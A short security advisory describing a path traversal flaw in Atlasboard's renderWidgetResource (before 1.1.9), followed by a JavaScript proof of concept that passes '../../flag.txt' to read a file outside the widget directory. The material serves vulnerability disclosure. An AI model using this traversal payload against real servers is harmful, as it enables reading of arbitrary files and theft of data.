GHSA-25pr-6pr6-68v7

The renderWidgetResource resource in Atlasian Atlasboard before version 1.1.9 allows remote attackers to read arbitrary files via a path traversal vulnerability.

PoC

const widget = require(\"atlasboard/lib/webapp/routes/widget\");

// Mock req and res
const req = {};
const res = {
  sendFile: (filePath) => {
    // Read and return file contents synchronously
    const data = fs.readFileSync(filePath, \"utf8\");
    console.log(\"Contents of /flag.txt:\");
    console.log(data);
  },
  status: function (code) {
    this.statusCode = code;
    return this;
  },
  send: function (msg) {
    throw new Error(`Server responded with status ${this.statusCode}: ${msg}`);
  },
};

// localPackagesPath set to root to allow traversal to /flag.txt
const localPackagesPath = \"/\";

// resource string with path traversal to escape localPackagesPath and widgets directory
const resource = \"../../flag.txt\";

// Call vulnerable function
await widget.renderWidgetResource(localPackagesPath, resource, req, res);